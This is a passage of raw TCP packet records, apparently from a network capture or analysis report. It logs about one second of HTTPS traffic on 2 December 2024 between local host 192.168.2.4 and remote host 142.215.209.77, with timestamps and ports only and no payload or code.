                                                            Dec 2, 2024 09:18:16.225824118 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.225831032 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.228487015 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.228544950 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.228552103 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.231926918 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.231985092 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.231993914 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.234546900 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.234615088 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.234621048 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.237262011 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.237317085 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.237323999 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.240648031 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.240706921 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.240714073 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.243331909 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.243386984 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.243392944 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.245995998 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.246052027 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.246058941 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.246073961 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.249958992 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.250017881 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.250024080 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.253078938 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.253132105 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.253138065 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.255814075 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.255870104 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.255877018 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.285171032 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.285232067 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.285243988 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.334207058 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.395220041 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.395227909 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.395286083 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.395286083 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.395334005 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.418998957 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.419007063 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.419063091 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.419074059 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.420996904 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.421006918 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.421058893 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.421068907 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.424391985 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.424449921 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.424448013 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.424473047 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.424494028 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.426987886 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.427046061 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.427052975 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.429792881 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.429850101 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.429857969 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.433085918 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.433135986 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.433144093 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.435693026 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.435745955 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.435753107 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.438430071 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.438488007 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.438494921 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.441836119 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.441895962 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.441904068 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.444492102 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.444554090 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.444561005 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.447123051 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.447187901 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.447195053 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.450512886 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.450579882 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.450587034 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.453567982 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.453634024 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.453640938 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.456299067 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.456351995 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.456358910 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.486404896 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.486464977 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.486473083 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.537326097 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.598234892 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.598248959 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.598298073 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.598300934 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.598360062 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.620198965 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.620209932 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.620291948 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.620305061 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.622270107 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.622278929 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.622323036 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.622330904 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.622360945 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.625669003 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.625700951 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.625734091 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.625741005 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.625758886 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.628355980 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.628412962 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.628418922 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.630983114 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.631057024 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.631063938 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.634332895 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.634387970 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.634394884 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.637082100 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.637142897 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.637150049 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.640436888 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.640495062 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.640501976 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.643086910 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.643141031 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.643146992 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.645817041 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.645874023 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.645880938 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.649146080 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.649208069 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.649214029 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.651834965 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.651890039 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.651896954 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.654836893 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.654898882 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.654906988 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.657562971 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.657623053 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.657629967 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.687669039 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.687735081 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.687742949 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.740478992 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.799498081 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.799505949 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.799556971 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.799588919 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.799668074 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.821985960 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.821993113 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.822103977 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.822112083 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.823740959 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.823749065 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.823837996 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.823846102 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.827130079 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.827166080 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.827192068 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.827198029 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.827224970 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.829742908 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.829833031 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.829839945 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.832413912 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.832504034 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.832511902 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.835839033 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.835947037 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.835953951 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.838457108 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.838823080 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.838831902 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.841188908 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.841299057 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.841305017 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.844526052 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.844623089 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.844630957 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.847405910 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.847590923 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.847598076 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.849853039 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.850040913 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.850047112 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.853302956 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.853419065 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.853425980 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.856329918 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.856448889 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.856455088 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.859462023 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.859551907 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.859559059 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.888832092 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.888933897 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.888941050 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.943572998 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.000650883 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.000659943 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.000694990 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.000729084 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.000761032 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.023024082 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.023030996 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.023339987 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.023349047 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.025821924 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.025830984 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.025948048 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.025955915 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.028439999 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.028448105 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.028687954 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.028695107 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.031255960 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.031290054 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.031328917 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.031337023 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.031364918 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.034564018 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.034784079 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.034790993 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.037265062 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.037416935 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.037422895 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.039963961 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.040060997 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.040067911 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.043308020 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.043415070 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.043421030 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.045948982 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.046084881 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.046092033 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.048649073 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.048759937 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.048768997 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.052028894 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.052155972 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.052155972 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.052165031 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.054734945 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.054842949 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.054850101 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.057666063 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.060386896 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.060435057 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.060441971 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.060477018 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.090059042 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.090128899 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.090137005 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.146979094 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.201920033 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.201927900 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.202025890 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.202033997 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.225099087 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.225132942 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.225162029 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.225168943 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.225198984 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.228005886 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.228013992 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.228111982 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.228120089 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.230686903 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.230812073 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.230818987 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.233323097 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.233478069 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.233484983 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.236700058 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.236908913 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.236915112 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.239468098 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.239579916 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.239587069 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.242805958 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.242862940 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.242870092 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.245425940 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.245508909 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.245516062 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.248071909 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.248171091 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.248179913 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.251652002 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.251718998 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.251724958 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.254158974 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.254230022 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.254236937 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.257178068 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.257275105 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.257281065 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.259876966 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.259982109 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.259989023 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.263278008 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.263576031 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.263590097 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.291451931 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.291755915 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.291764021 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.334213018 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.403852940 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.403861046 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.404026985 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.404040098 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.426693916 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.426819086 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.426826954 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.429311991 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.429353952 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.429377079 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.429390907 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.429416895 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.432054996 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.432192087 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.432199001 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.435381889 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.435647964 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.435657978 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.438118935 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.438405037 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.438416958 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.440713882 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.440871954 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.440879107 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.444103956 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.444215059 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.444221020 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.446850061 CET44349733142.215.209.77192.168.2.4
